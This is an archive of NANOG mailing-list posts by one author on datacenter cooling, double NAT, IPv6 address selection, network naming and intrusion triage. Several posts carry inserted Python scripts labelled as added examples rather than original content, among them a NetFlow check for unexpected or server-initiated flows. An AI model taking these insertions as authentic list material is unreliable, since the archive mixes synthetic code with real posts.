Re: "Hypothetical" Datacenter Overheating

2024-01-16 Thread Nathan Ward via NANOG
On 16/01/2024 at 10:50:13 PM, Saku Ytti  wrote:

> On Tue, 16 Jan 2024 at 11:00, William Herrin  wrote:
>
> You have a computer room humidified to 40% and you inject cold air
>
> below the dew point. The surfaces in the room will get wet.
>
>
> I think humidity and condensation is well understood and indeed
> documented but by NEBS and vendors as verboten.
>
> I am more interested in temperature changes when not condensating and
> causing water damage. Like we could theorise, some soldering will
> expand/contract too fast, breaking or various other types of scenarios
> one might guess without context, and indeed electronics often have to
> experience large temperature gradients and appear to survive.
> When you turn these things on, various parts rapidly heat from ambient
> to 80-90c. So I have some doubts if this is actually a problem you
> need to consider, in absence of condensation.
>

Here’s some manufacturer specs:

https://www.dell.com/support/manuals/en-nz/poweredge-r6515/per6515_ts_pub/environmental-specifications?guid=guid-debd273c-0dc8-40d8-abbc-be059a0ce59c=en-us

3rd section, “Maximum temperature gradient”.

From memory, the management cards alarm when the gradient is exceeded, too.

--
Nathan Ward


Re: New addresses for b.root-servers.net

2023-06-02 Thread Nathan Ward
On 2/06/2023 at 10:22:46 AM, Wes Hardaker  wrote:

>
> 2. I'll note that we are still serving DNS requests at the addresses that
> we switched away from in 2017 [1][2].  At that time we actually only
> promised 6 months and we've doubled that time length with our latest
> announced change.  But we do need a date after which we can turn off
> service to an address block if some reason demands it.
>

Hi Wes,

Seems to me that this could be heavily informed by historical data from
this earlier renumbering.

Do you have query rates over time for the old and new addresses since this
change in 2017?

Even if you end up with the same answer of 12mo, data supporting it may
give comfort to the community.

Maybe you make a call that once it’s at say 1% or 0.1% or something like
that, then it’s OK to turn off - and make a prediction for when that might
be based on the historical data.

--
Nathan Ward


Re: Finding content in your job title

2010-03-30 Thread Nathan Ward
On 31/03/2010, at 4:26 PM, Steve Bertrand wrote:

 On 2010.03.30 23:20, Jorge Amodio wrote:
 I'd say that probably around here for those like me that have been in
 operations/engineering management positions we don't give a squat
 about what title your biz card says you have, your actions and
 performance speak by themselves.
 
 There are no kings around here so titles most of the time are worthless.
 
 By asking what title may impress others is sort of a -1 to start.
 
 It isn't about impression.
 
 I'd put 'janitor' on my business card for all I really care.

I'm pretty sure Jonny Martin was Chief Internet Janitor in his previous role.

He cleaned the tubes so the sewage could flow.

--
Nathan Ward



Re: NANOG Digest, Vol 26, Issue 122

2010-03-24 Thread Nathan Ward
On 25/03/2010, at 4:32 PM, Rudolph Daniel wrote:

 Hi Joe
 You guys ever mount your racks on Barry mounts= vibration mounts..with so
 many shakes you may need to.
 RD

Nope.

Instead, we stick it at the top of big towers that buffer the vibrations as 
they go up the tower.
http://en.wikipedia.org/wiki/Sky_Tower

From memory, we can thank/blame Joe for much of that.

Up that tower we have the main switches for the Auckland Peering Exchange 
(which has in the last few years become a bit more distributed), the (main, or 
only) POPs for a bunch of offshore transit, including Pacnet and Vocus, and 
also an F-root instance.

From memory it's the highest AGL peering exchange in the world. Probably the 
highest F-Root instance in the world as well.

When there are high winds, the service lift that stops at the right levels 
cannot run, because it's on a longer shaft and so moves around a lot more. So 
you have to take the regular tourist glass-bottomed lift and then walk down 
about 6 flights to the comms floors.
Also in moderate winds any unfastened cabinet doors will move with the sway of 
the tower. Try going up there at 4am after watching a thriller.

Also the floor to ceiling glass about 2 feet from the bottom of the ladder 
you're at the top of a 50RU rack with. Plus the swaying building.
You get over your vertigo pretty quickly, or you just don't go up the tower 
more than once.

--
Nathan Ward


Re: IP4 Space

2010-03-22 Thread Nathan Ward
On 19/03/2010, at 4:07 AM, Stan Barber wrote:

 1. Almost all home users (not businesses) that are connected to the Internet 
 today via IPv4 are behind some kind of NAT box. In some cases, two NATs (one 
 provided by the home user's router and one provided by some kind of ISP). 
 There is no need for this using IPv6 to communicate with other IPv6 sites.

There are a large number of users, here in NZ at least, but I imagine in other 
places, that have a single ethernet port ADSL Modem which terminates PPP, 
does IPv4 NAT, DHCP, etc. and then a Wireless Router which has its ethernet 
Internet plug connected to the ADSL Modem, and does IPv4 NAT, DHCP to end 
hosts, etc.

This means that they have double NAT inside the home, and then in the future a 
potential third NAT. We did some looking at packets, and 17% of outbound 
packets from customers at an ISP had TTLs that indicated two L3 hops in the 
home - which for the majority of cases would mean double NAT.

In NZ the most popular ADSL deployment is PPPoATM, so the ADSL unit the ISP 
ships (either loaned, or included in the install cost) is an IPv4 router 
terminating a PPPoATM connection, not a bridge or anything.

--
Nathan Ward
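As an added example (not code from the post above), here is the TTL arithmetic behind that 17% figure: each router in the home decrements the TTL by one, so the distance from a packet's TTL at the ISP to the nearest common initial TTL counts the in-home hops. The packet sample and the assumption that capture happens at the first ISP router past the PPP session are constructed.

```python
"""Infer in-home L3 hop counts from the IP TTL seen at an ISP capture point.

Added example, not code from the original post. Assumes the capture point
is the first ISP router past the customer's PPP session (isp_hops=0) and
that hosts start with one of the common initial TTLs listed below.
"""

from collections import Counter

# Initial TTLs used by common operating systems (constructed list):
# 32 (old Windows), 64 (Linux, macOS, BSD), 128 (Windows), 255 (Cisco, Solaris)
INITIAL_TTLS = (32, 64, 128, 255)


def infer_hops(ttl, isp_hops=0, max_hops=30):
    """Return the number of routers inside the customer premises that a
    packet crossed, or None if the TTL cannot be matched to a known initial
    TTL within max_hops. isp_hops is subtracted for routers between the
    customer and the capture point."""
    for initial in INITIAL_TTLS:
        if ttl <= initial and initial - ttl <= max_hops:
            hops = initial - ttl - isp_hops
            return hops if hops >= 0 else None
    return None


def home_hop_distribution(packets, isp_hops=0):
    """packets: iterable of (src_ip, ttl) as captured at the ISP.
    Returns (Counter of hop counts, fraction of packets showing exactly
    two in-home hops, i.e. the double-NAT signature)."""
    counts = Counter()
    for _src, ttl in packets:
        hops = infer_hops(ttl, isp_hops)
        counts["unknown" if hops is None else hops] += 1
    total = sum(counts.values())
    return counts, (counts[2] / total if total else 0.0)


# Constructed sample: ten outbound packets captured at the ISP edge.
# 62 and 126 are one decrement further from 64/128 than the rest: two hops.
SAMPLE = [
    ("10.0.0.1", 63), ("10.0.0.2", 63), ("10.0.0.3", 127),
    ("10.0.0.4", 62), ("10.0.0.5", 126),
    ("10.0.0.6", 63), ("10.0.0.7", 254), ("10.0.0.8", 63),
    ("10.0.0.9", 127), ("10.0.0.10", 63),
]

if __name__ == "__main__":
    counts, frac = home_hop_distribution(SAMPLE)
    print(dict(counts))
    print(f"{frac:.0%} of packets show two L3 hops in the home")
```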


Re: AARNet AS7575 announcing 1.0.0.0/24, 1.1.1.0/24 and 1.2.3.0/24 soon

2010-03-17 Thread Nathan Ward
On 17/03/2010, at 7:51 PM, Skeeve Stevens wrote:

 Hey George,
 
 If AARNet or someone has the bandwidth, would it not be of value to announce 
 the entire 1/8 and see what areas are targeted by traffic - clearly analysing 
 it and removing DoS or scan traffic.
 
 I'm just wondering if there are any /24's or space that is unsuitable to 
 allocate inside 1/8.

If only there was someone who pushed a whole lot of outbound data and had not 
really that much inbound - advertising 1/8 wouldn't really impact them that 
much. Some kind of, video sharing site, maybe?

route-views> sh ip bgp 1.0.0.0/8
BGP routing table entry for 1.0.0.0/8, version 600951180
Paths: (24 available, no best path)
Flag: 0x820
  Not advertised to any peer
  1239 174 36561
144.228.241.130 (inaccessible) from 144.228.241.130 (144.228.241.130)
  Origin IGP, localpref 100, valid, external

% whois -a AS36561 | grep -i name
OrgName:    YouTube, Inc.

:-)

--
Nathan Ward


Re: anti-ddos test solutions ?

2010-03-17 Thread Nathan Ward
Hire/buy what I know as a router tester. People call them different things.
It's a device that generates packets, and can normally simulate TCP etc. all 
the way up to HTTP etc. or higher. BGP, OSPF, MPLS, etc. etc. etc.
Tell it to generate packets that look like they come from many many hosts (you 
can normally simulate some kind of network topology with hosts in different 
places and hence different TTLs etc.), and voila.
They normally let you generate background noise traffic, or you could record 24 
hours of packet headers from somewhere in your network and play it back through 
your test network. This needs a lot of disk of course.

I used to work for an anti-ddos vendor (Esphion, now owned by Allot) and built 
their first test rig. First we did it with a bank of PCs with custom Linux 
kernel code to generate packets because we were a startup doing things on the 
cheap and I was a bit masochistic. Then we got a router tester and did exactly 
the same thing, but in a whole lot less space with a whole lot less effort.

Both worked great, naturally I recommend a router tester.

--
Nathan Ward


Re: CSIRT - Backbone Security : Runtime Monitoring and DynamicReconfiguration for Intrusion Detection Systems

2010-03-17 Thread Nathan Ward
Dig up.

On 18/03/2010, at 2:32 PM, Guillaume FORTAINE wrote:

 Misses, Misters,
 
 I have read with interest what everybody told in this thread and it seems 
 that they consider everything new as spam.
 
 My conclusion is that they fear what it is new.
 
 Best Regards,
 
 Guillaume FORTAINE
 
 
 On 03/18/2010 02:09 AM, Michael Sokolov wrote:
 My spammy sense is going nuts just at the whole ALL CAPS of this guy's
 last name.
 
 I thought all-uppercase last names were a traditional French convention...
 This guy is French, isn't he? - judging by his name.
 
 His habit of addressing everyone as Mister is peculiar indeed, but
 maybe he is really just very new to the customs and conventions of the
 Anglophone Internet community?
 
 Just wondering...
 
 MS


Re: Network Naming Conventions

2010-03-15 Thread Nathan Ward
On 16/03/2010, at 2:10 AM, Adcock, Matt [HISNA] wrote:

 I've used a Jimmy Buffett theme in test labs before.

Naming themes are fine in test labs, because devices have a different 
function/role several times per day, a name acts like an asset tag in that it 
sticks with it through its lifetime.

Same goes for those servers that sit in our networks that I can only really 
think to call bitch boxes. They do all sorts of random one-off network 
hackery tasks, and never get any love. They're not supposed to scale, they were 
only supposed to be there for one job 5 years ago and they're still there.

If I've got guys out there rolling out gear according to cookie cutter designs, 
I don't want them coming up with names and using ex girlfriends or TV shows or 
whatever. They're going to run out of ideas, and I don't want to have 50 boxes 
called rachel on the network with no idea what they do. That sort of thing 
works fine when you're the only person putting the names in to boxes - like in 
a lab - but no good if you've grown much.

I'm a contractor/consultant type thing, and getting my customers to use naming 
schemes like the rant that follows helps me understand their network if they do 
things without me, and helps anyone else who comes along too.


So, for production network and server gear, I like domain names built with city 
and site codes:
site.city.domain

Perhaps if I had a bigger network I'd have .country.domain on the end of that 
instead.

Hosts within each site are told to search within their site, then city, then 
domain. Here's how in resolv.conf:
search site.city.domain, city.domain, domain

This lets me refer to a host called 'access-1' as, access-1, or access-1.site, 
or access-1.site.city depending on where I am. That's handy and saves my lazy 
ass typing lots. It also means we can have standard configs for lots of things. 
For example, we can syslog to syslog and it will choose either the one in the 
local site if its size warrants it, or one in the city, or a network-wide one. 
I'm sure you can think of other ways this can be useful.

It can be annoying when a box doesn't let you display a full hostname in a 
prompt, or fudge it and set the hostname to hostname.site.city because 
hostnames shouldn't have periods in them. YMMV, etc. The benefits outweigh the 
negatives for me I think. Things can get a bit hairy when devices identify 
themselves by their hostnames in some other protocols though. Ignoring that and 
using DNS is encouraged, etc.

As for hostnames themselves, I have varying ways of doing that, but I never use 
a naming scheme that won't scale for.. a long time.
I always use numbers, but never use leading zeros - ie. access-1, not 
access-001. It's not hard to sort numerically, come on now.
I generally try to use something that describes the devices function. 
access-[1-9][0-9]* = access router. core-[1-9][0-9]* = core router. IP is 
implied unless it's something else, ie. (eth|atm)-access-[1-9][0-9]* are 
Ethernet or ATM switches.

For places where I collapse functionality, ie. a small site with collapsed core 
and access boxes, I call them access, because they are less to move and hence 
need renaming when core boxes come in the future to support additional access 
boxes.

Interface addresses in DNS include the interface name and VLAN or some other 
logical circuit details (PVC, etc.), as is common.

Juniper boxes have re0-hostname.domain and re1-hostname.domain, and also 
re-hostname.domain if I've got a moving master IP address configured.

That's about all I can think of to write, I hope it's useful to someone, YMMV, 
etc.

--
Nathan Ward
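An added example, not code from the post above, that turns the scheme into a check: a validator for the access/core hostname pattern (numbers without leading zeros, optional media prefix) and a small emulation of the resolv.conf search order showing "syslog" landing on the site, city or network-wide server depending on where the client sits. The zone contents and the site/city/domain names are constructed.

```python
"""Hostname scheme validator and search-order emulation for the naming
conventions in the post above.

Added example, not code from the original post. ZONE and the site/city
names are constructed; the resolver emulation models only the search
list and ndots behaviour of a stub resolver, nothing else.
"""

import re

# Optional media prefix, function, numeric index without leading zeros.
HOST_RE = re.compile(
    r"^(?:(?P<media>eth|atm)-)?(?P<role>access|core)-(?P<n>[1-9][0-9]*)$"
)


def classify(hostname):
    """Return (media, role, index) for a conforming hostname, else None.
    media is 'ip' when no prefix is given, since IP is implied."""
    m = HOST_RE.match(hostname)
    if not m:
        return None
    return (m.group("media") or "ip", m.group("role"), int(m.group("n")))


def search_list(site, city, domain):
    """The search order a host at site.city.domain is told to use."""
    return [f"{site}.{city}.{domain}", f"{city}.{domain}", domain]


def candidates(name, search, ndots=1):
    """FQDNs tried, in order, for a possibly partial name. Like a stub
    resolver: names with at least ndots dots are tried as-is first."""
    if name.endswith("."):
        return [name.rstrip(".")]
    with_search = [f"{name}.{suffix}" for suffix in search]
    if name.count(".") >= ndots:
        return [name] + with_search
    return with_search + [name]


def resolve(name, zone, search):
    """Return (fqdn, address) of the first candidate present in zone."""
    for fqdn in candidates(name, search):
        if fqdn in zone:
            return fqdn, zone[fqdn]
    return None


# Constructed zone: a syslog server per site, per city, and network-wide,
# so 'syslog' in a standard config picks the nearest one that exists.
ZONE = {
    "syslog.akl-dc1.akl.example.net": "192.0.2.10",
    "syslog.akl.example.net": "192.0.2.20",
    "syslog.example.net": "192.0.2.30",
    "access-1.wlg-dc1.wlg.example.net": "192.0.2.40",
    "core-1.akl.example.net": "192.0.2.50",
}

if __name__ == "__main__":
    for h in ("access-1", "eth-access-12", "core-3", "access-001", "rachel"):
        print(f"{h:14} -> {classify(h)}")
    akl = search_list("akl-dc1", "akl", "example.net")
    wlg = search_list("wlg-dc1", "wlg", "example.net")
    print("syslog from akl-dc1:", resolve("syslog", ZONE, akl))
    print("syslog from wlg-dc1:", resolve("syslog", ZONE, wlg))
    print("access-1.wlg-dc1.wlg from akl:", resolve("access-1.wlg-dc1.wlg", ZONE, akl))
```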




Re: OBESEUS - A new type of DDOS protector

2010-03-15 Thread Nathan Ward
If only there were other security experts on this list with a proven ability to 
make this thread even more absurd.

On 16/03/2010, at 4:47 PM, Guillaume FORTAINE wrote:

 Misters,
 
 Thank you for your reply.
 
 1) First of all, I am absolutely not related to the Obeseus project. From my 
 point of view,  the interesting things were that :
 
 a) This project was unknown.
 
 http://www.google.com/search?q=obeseus+ddosbtnG=Searchhl=enesrch=FT1sa=2
 
 
 b) This project comes from an ISP.
 
 http://www.loud-fat-bloke.co.uk/links.html
 
 
 c) Its code is Open Source.
 
 http://www.loud-fat-bloke.co.uk/tools/obeseusvB.tar.gz
 
 
 My conclusion is that I give far more credit to Obeseus than to Arbor 
 Networks. By the way, I am surprised that this post didn't generate more 
 interest given the uninteresting babble that I have been forced to read in 
 the past on the NANOG mailing-list from the so-called experts.
 
 
 2) EDoS is a DDoS 2.0
 
 DDoS is about malicious traffic.
 
 EDoS is malicious traffic engineered to look like legitimate one.
 
 However, the goal is the same : to obliterate the service infrastructure, 
 to quote Mister Morrow.
 
 
 
 3) I do my homeworks something that doesn't seem to be the case for a lot of 
 people on this mailing-list.
 
 a) I would want to highlight the post of Tom Sands, Chief Network Engineer, 
 Rackspace Hosting entitled DDoS mitigation recommendations [1].
 
 -It seems evidence that he tried the Arbor solution so the three Arbor++ 
 mails don't make sense.
 
 -About the fourth one :
 
 Sorry but RTFM
 
 http://mailman.nanog.org/pipermail/nanog/2010-January/thread.html#16675
 
 Best regards
 
 Hey kid, Tom Sands subscribed nearly a decade ago on the NANOG mailing-list. 
 When you went out of school, he was already dealing with DoS concerns :
 
 http://www.mcabee.org/lists/nanog/Jan-02/msg00177.html
 
 
 
 b) I am really asking myself how much credit I could give to a spam expert, 
 Suresh Ramasubramanian, about a DDoS related post [2].
 
 
 c) Mister Morrow, even if you are a Network Security engineer at Google [3] 
 (morr...@google.com) :
 
 -You didn't provide any useful feedback on Obeseus.
 
 -You totally missed the point on my other mails.
 
 This is definitely disappointing.
 
 
 Is this mailing-list a joke ?
 
 Especially, where is Roland Dobbins ?
 
 
 Best Regards,
 
 Guillaume FORTAINE
 
 [1] http://mailman.nanog.org/pipermail/nanog/2010-January/016675.html
 [2] http://www.hserus.net/
 [3] http://www.linkedin.com/in/morrowc
 
 
 
 On 03/16/2010 03:11 AM, Suresh Ramasubramanian wrote:
 I got your point.  What I was saying is that what he calls EDoS (and
 I'm sure he'll say obliterating infrastructure is the ultimate form of
 an economic dos) is just what goes on ...
 
 You may or may not be able to overload the AWS infrastructure by too
 many queries but you sure as hell will blow the application out if
 that ddos isnt filtered .. edos again.
 
 On Tue, Mar 16, 2010 at 7:35 AM, Christopher Morrow
 morrowc.li...@gmail.com  wrote:
   
 
 eh.. I guess I'm splitting hairs. the goal of 100k bots sending 1
 query per second to a service that you know can only sustain 50k
 queries/second is.. not to economically Dos someone, it's to
 obliterate their service infrastructure.
 
 Sure, you could ALSO target something hosted (for instance) at
 Amazon-AWS and increase costs by making lots and lots and lots of
 queries, but that wasn't the point of what Deepak wrote, nor what i
 corrected.


Re: 4bytes ASn and RFC1745

2010-03-14 Thread Nathan Ward
On 14/03/2010, at 8:39 PM, Bit Gossip wrote:

 experts,
 what are the consequences of 4bytes ASn (RFC4893) for RFC1745 -
 BGP4/IDRP for IP---OSPF Interaction?
 
 In particular with regards to storing the AutonomousSystem in the lowest
 16 bits of the External Route Tag (=32 bits)?
 Thanks,
 bit

Little practical consequences I expect. This is taken from RFC3167, section 1, 
in 2001:

During a review of internet standards relating to BGP, it became apparent that 
BGP/IDRP OSPF interaction, as described in RFC 1745, has never been deployed in 
the public internet, and would require significant implementation complexity. 
Since this mechanism has never been in use in the public internet, it is 
proposed to reclassify it to Historic.

--
Nathan Ward


Re: Security Guideance

2010-02-23 Thread Nathan Ward
Using lsof, netstat, ls, ps, looking through proc with ls, cat, etc. is likely 
to not work if there's a rootkit on the box. The whole point of a rootkit is to 
hide processes and files from these tools.

Get some statically linked versions of these bins on to the server, and hope 
they haven't patched your kernel.

Are you sure that it's someone who has root? How do you know? Is it not 
possible that it's someone running this from a PHP script or something, that 
they've gotten on to the server with the help of a vulnerability in some 
customer's website code? Maybe it's even a customer doing this intentionally?
I've seen this sort of thing where they don't even write the code to disk - 
some vuln in a PHP script lets them download code from some remote server and 
execute it from memory - PHP's require() accepts a URL.

The usual thing to do here is to take the server offline and make a copy of the 
disk with a writeblocker in place to prevent further changes, etc. and then 
inspect the image of the disk on a machine that is not using any binaries from 
that disk. If there really is a rootkit in place then you'll likely find it.
If you're unable to do this, perhaps boot up the server from a CD, there are 
plenty of forensic analysis/security targeted Linux boot CDs around.

If you're unable to capture full packets, perhaps netflow would be useful? - 
look for incoming data to ports you don't expect. It's much more lightweight on 
your data storage, and probably doesn't involve you putting in a new server - 
but a bit heavier on your network kit.

--
Nathan Ward
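An added example, not code from the post above: a pass over NetFlow-style records that flags the two things suggested, inbound flows to ports a server is not expected to serve, and outbound connections a server opened itself (the trace a web server fetching code from a remote host leaves in flow data). The flow lines, server port lists and resolver address are constructed.

```python
"""Flag unexpected inbound and server-initiated outbound flows in
NetFlow-style records, as suggested in the post above.

Added example, not code from the original post. Records are treated as
unidirectional; a reply flow leaving an unexpected server port shows up
as a second finding for the same event. All addresses and port lists
below are constructed.
"""

from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    nbytes: int


def parse_flow(line):
    """Parse one 'src,sport,dst,dport,proto,bytes' line (constructed export)."""
    src, sport, dst, dport, proto, nbytes = line.strip().split(",")
    return Flow(src, int(sport), dst, int(dport), proto, int(nbytes))


# Ports each monitored server is expected to accept (constructed).
EXPECTED = {
    "203.0.113.10": {80, 443, 22},   # web server
    "203.0.113.11": {25, 587, 22},   # mail server
}

# Outbound connections servers are allowed to open (constructed: local resolver).
ALLOWED_OUTBOUND = {("203.0.113.53", 53)}


def review(flows, expected=EXPECTED, allowed_outbound=ALLOWED_OUTBOUND):
    """Return [(kind, flow)] for flows worth a look: inbound to a port the
    server should not be serving, or a server acting as a client toward a
    destination it has no business contacting."""
    findings = []
    for f in flows:
        if f.dst in expected and f.dport not in expected[f.dst]:
            findings.append(("unexpected-inbound", f))
        elif (f.src in expected and f.sport not in expected[f.src]
              and (f.dst, f.dport) not in allowed_outbound):
            # Source port is ephemeral, so the server initiated this one.
            findings.append(("server-initiated-outbound", f))
    return findings


def review_lines(text):
    return review([parse_flow(l) for l in text.splitlines() if l.strip()])


# Constructed sample: normal web traffic, an IRC-port probe, the web
# server pulling something from a remote host, and a DNS query.
SAMPLE_FLOWS = """\
198.51.100.7,51000,203.0.113.10,443,tcp,4200
203.0.113.10,443,198.51.100.7,51000,tcp,98000
198.51.100.9,52000,203.0.113.10,6667,tcp,1500
203.0.113.10,51234,192.0.2.66,8080,tcp,220000
203.0.113.10,44000,203.0.113.53,53,udp,90
198.51.100.11,53000,203.0.113.11,25,tcp,3000
"""

if __name__ == "__main__":
    for kind, f in review_lines(SAMPLE_FLOWS):
        print(f"{kind:26} {f.src}:{f.sport} -> {f.dst}:{f.dport} {f.nbytes}B")
```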


Re: ATT resolvers

2010-02-16 Thread Nathan Ward
On 17/02/2010, at 1:28 AM, Michael McGovern wrote:

 Does anyone know if ATT has public DNS resolvers? We are an ATT customer 
 and they informed us that we could not use their DNS servers unless we paid 
 for it.  That was several years ago and do not know if they have changed 
 their stance on this.  I’m already a paying customer and I have to pay to use 
 their DNS resolvers?

A few moments on Google finds:
- 68.94.156.1
- 68.94.157.1

They seem to work.

I suspect you asked them the wrong question, or they interpreted your question 
incorrectly, or for some other reason thought you wanted them to be 
authoritative for some zone you control.

--
Nathan Ward


Re: Denic (.de) blocking 6to4 nameservers (since begin feb 2010)

2010-02-15 Thread Nathan Ward
On 16/02/2010, at 5:03 AM, Tim Chown wrote:

 On Fri, Feb 12, 2010 at 08:16:56AM +1100, Mark Andrews wrote:
 
 If you can't get native IPv6 then use a tunneled service like
 Hurricane Electric's (HE.NET).  It is qualitatively better than
 6to4 as it doesn't require random nodes on the net to be performing
 translation services for you which you can't track down the
 administrators of.  You can get /48's from HE.
 
 Our external IPv6 web accesses are still very low, but have grown
 linearly over the last five years from 0.1% in 2005/06 to 0.5% of
 total web traffic now.   Internally of course our figures are higher.
 
 Of that IPv6 traffic, 1% comes from 2002::/16 prefixes.   Even less
 from Teredo prefixes.   I guess we could run stats against known TB
 prefixes to determine who is using those.  

You are very unlikely to get traffic from Teredo, because:
1) Windows only asks for AAAA if it has non-Teredo IPv6 connectivity
2) When Windows has non-Teredo IPv6 connectivity and so can ask for AAAA, 
preference for reaching your web content is going to be non-Teredo IPv6 - IPv4 
- Teredo, due to the prefix policy table, unless you have an AAAA in 2001::/32 
(Teredo space), in which case it will prefer IPv4 - Teredo.


With 6to4, Windows hosts will ask for AAAA, and will prefer non-6to4 IPv6 over 
6to4 over IPv4. I'm a little surprised at how little 6to4 traffic you get.

Teredo gets most use when an application asks for a connection to a certain 
IPv6 address, without DNS. This is most common in peer to peer - you're not 
going to levels of web traffic and P2P traffic using Teredo that are comparable 
ratios to IPv4.

My expectation is that lines in your web logs in 2001::/32 have user agent 
strings indicating non-Windows hosts - or perhaps someone has miredo running on 
a proxy server, or perhaps the users' non-Teredo IPv6 AND IPv4 paths to you 
were broken when they tried to make a request. Stranger things have happened..

I wrote some code that will allow you to better understand the connectivity 
that end users of your web content have - when they visit your site it has them 
get 1x1 px transparent GIF images from various different hostnames with 
different characteristics in the DNS, and then reports back which loaded and 
how long.
http://www.braintrust.co.nz/ipv6wwwtest/
Wikipedia were running this for a while, on every 100th hit. They did a 
modification to this where they also had a large image to test for pmtud 
errors. Google are using a similar technique to test IPv6 capabilities and 
networks.
I'll add something with the pmtud stuff in the next week or so, and I'll also 
push the code to github.
You'll probably want to make your own changes based on what you're interested 
in, also.

--
Nathan Ward
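An added example, not code from the post above, of the prefix policy ordering it describes: a longest-prefix lookup in the default policy table (the RFC 3484 entries plus the 2001::/32 Teredo entry Windows adds; values are assumed here) that ranks candidate destinations by precedence only, leaving out the source-label rules. It reproduces the native IPv6 > IPv4 > Teredo and 6to4 > IPv4 orderings from the post.

```python
"""Rank candidate destination addresses by prefix-policy precedence.

Added example, not code from the original post. POLICY holds the RFC 3484
default table plus the 2001::/32 (Teredo) entry Windows Vista/7 add;
these values are an assumption about that table. Only RFC 3484 rule 6
(prefer higher precedence) is modelled, not label matching against the
chosen source address.
"""

import ipaddress

# (prefix, precedence, label): higher precedence is preferred.
POLICY = [
    (ipaddress.ip_network("::1/128"), 50, 0),        # loopback
    (ipaddress.ip_network("::/0"), 40, 1),           # native IPv6
    (ipaddress.ip_network("2002::/16"), 30, 2),      # 6to4
    (ipaddress.ip_network("::/96"), 20, 3),          # IPv4-compatible
    (ipaddress.ip_network("::ffff:0:0/96"), 10, 4),  # IPv4-mapped (i.e. IPv4)
    (ipaddress.ip_network("2001::/32"), 5, 5),       # Teredo
]


def as_ipv6(addr):
    """Represent an A-record answer as an IPv4-mapped IPv6 address so it
    can be looked up in the same table, as the selection algorithm does."""
    a = ipaddress.ip_address(addr)
    if a.version == 4:
        return ipaddress.IPv6Address(f"::ffff:{a}")
    return a


def lookup(addr):
    """Longest-prefix match in POLICY; returns (precedence, label)."""
    a = as_ipv6(addr)
    best = None
    for net, prec, label in POLICY:
        if a in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, prec, label)
    return best[1], best[2]


def order_destinations(addrs):
    """Most-preferred destination first; stable for equal precedence."""
    return sorted(addrs, key=lambda a: lookup(a)[0], reverse=True)


if __name__ == "__main__":
    # Constructed answers: a Teredo AAAA, an A record and a native AAAA.
    print(order_destinations(["2001:0:4136:e378::1", "192.0.2.1", "2001:db8::1"]))
    # Only a Teredo AAAA and an A record: IPv4 wins.
    print(order_destinations(["2001:0:4136:e378::1", "192.0.2.1"]))
    # 6to4 AAAA and an A record: 6to4 wins.
    print(order_destinations(["192.0.2.1", "2002:c000:204::1"]))
```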


Re: Denic (.de) blocking 6to4 nameservers (since begin feb 2010)

2010-02-15 Thread Nathan Ward
On 16/02/2010, at 7:34 PM, Mikael Abrahamsson wrote:

 On Tue, 16 Feb 2010, Nathan Ward wrote:
 
 You are very unlikely to get traffic from Teredo, because:
 1) Windows only asks for AAAA if it has non-Teredo IPv6 connectivity
 
 Please don't just say windows as the different versions of windows behave 
 differently, as we've already discussed in the thread here:
 
 http://www.ops.ietf.org/lists/v6ops/v6ops.2008/msg01587.html
 
 Windows XP will happily use Teredo when faced with AAAA response only.
 
 What you're describing is Vista and Win7 I guess?

Yep, sorry!

XP won't ask for AAAA unless it has non-Teredo connectivity though I don't 
think.

--
Nathan Ward


Re: Denic (.de) blocking 6to4 nameservers (since begin feb 2010)

2010-02-15 Thread Nathan Ward
On 16/02/2010, at 7:47 PM, Mikael Abrahamsson wrote:

 On Tue, 16 Feb 2010, Nathan Ward wrote:
 
 XP won't ask for AAAA unless it has non-Teredo connectivity though I don't 
 think.
 
 That doesn't compute considering all the XP machines with Teredo addresses 
 that asked for my AAAA only content.
 
 http://www.ops.ietf.org/lists/v6ops/v6ops.2008/msg01582.html
 
 Of the users getting v6 only gif from non-tunnel-space, 58% were from Proxad 
 (free.fr I believe), and then on the list came UNINET, SUNET, FUNET 
 (university networks in .no, .se and .fi) and Hurricane electric.
 
 98% of Teredo users run Windows XP.
 88% of 6to4 users run Windows Vista.
 
 So 98% of Teredo users getting the v6only content (using DNS) was using 
 WinXP, so it does seem it does AAAA lookups.

I mean non-Teredo connectivity in addition to Teredo.

Perhaps they have Teredo and 6to4, and could not reach you via 6to4 so instead 
used Teredo, or, any number of scenarios.

--
Nathan Ward


Re: BIRD vs Quagga

2010-02-12 Thread Nathan Ward
On 13/02/2010, at 11:51 AM, Steve Bertrand wrote:

 fwiw, I've also heard good things about bgpd(8) and ospfd(8), but I
 haven't tried those either...zebra/Quagga just stuck.

OpenBGPd would be great for a public route server at an IX.

It's not so great for use in a network unless you run it on OpenBSD - FreeBSD 
has no metric attribute in its routing tables, so next-hop IGP metric cannot 
be compared as the two daemons do not communicate directly at all.
If you're on anything other than OpenBSD, I recommend Quagga. I can't comment 
on BIRD as I have no experience with it yet.

XORP is also interesting, it's a more JunOS like interface. It's also some 
quite heavy C++, so running it on the tiny Soekris boxes that I had meant it 
wouldn't work for me. If you can spare the CPU and RAM then give XORP a go.

--
Nathan Ward




Re: CYMRU Bogon Peering

2010-02-12 Thread Nathan Ward
On 13/02/2010, at 2:03 PM, Seth Mattinen wrote:

 On 2/12/2010 15:03, Steve Bertrand wrote:
 
 What time frame do you determine to be instability? The following is
 from a box that has ~25 neighbours. Since the box was reloaded (6w3d
 ago), I've had the same uptime with the Team Cymru neighbours as I do
 with internal gear. I can't say that I've experienced any instability at
 all. It is not uncommon for me to have noticed uptimes well beyond 30w.
 
 
 
 Mine are not so good:
 
 Neighbor        V    AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
 38.229.0.5      4 65333  115856  115859 16411814    0    0 01:33:51       30
 68.22.187.24    4 65333   26968   29671 16311293    0    0 2w4d           30
 
 I see you have 68.22.187.24 in your list too, but my uptime is less. Are
 you using increased hold times?

Nevermind BGP timers, do you normally do well holding TCP connections open for 
weeks on end across the Internet?

--
Nathan Ward


Re: .ve WHOIS Down?

2010-02-08 Thread Nathan Ward
On 9/02/2010, at 2:13 PM, Crist Clark wrote:

 For want of a better place to ask, I'm wondering if anyone monitoring
 this list might know what is up with the registro.nic.ve web site.
 The WHOIS at www.nic.ve refers to that site, and it appears to be down
 (for me and downforeveryoneorjustme.com too). Doing old fashioned
 native WHOIS isn't working any better.

$ whois -h whois.nic.ve nic.ve  

Servidor Whois de NIC-Venezuela (.VE)

Este servidor contiene informacion autoritativa exclusivamente de dominios .VE
